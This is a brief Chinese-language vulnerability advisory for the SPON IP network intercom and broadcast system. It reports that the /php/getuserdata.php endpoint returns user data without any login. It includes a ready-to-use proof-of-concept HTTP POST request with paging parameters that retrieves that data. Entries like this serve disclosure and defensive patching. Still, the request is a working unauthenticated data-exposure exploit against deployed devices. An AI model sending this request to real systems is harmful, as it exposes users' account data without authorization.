漏洞描述
世邦通信SPON IP网络对讲广播系统是一款集对讲、广播、报警于一体的IP音视频系统。在其某个或多个版本的Web管理平台中,存在一个名为 getuserdata.php的接口。该接口本应用于获取系统用户数据,但由于缺乏有效的身份验证和授权机制,导致攻击者无需登录即可直接访问此接口
世邦通信SPON IP网络对讲广播系统 /php/getuserdata.php 信息泄露漏洞
PoC代码
POST /php/getuserdata.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
jsondata[pageIndex]=0&jsondata[pageCount]=30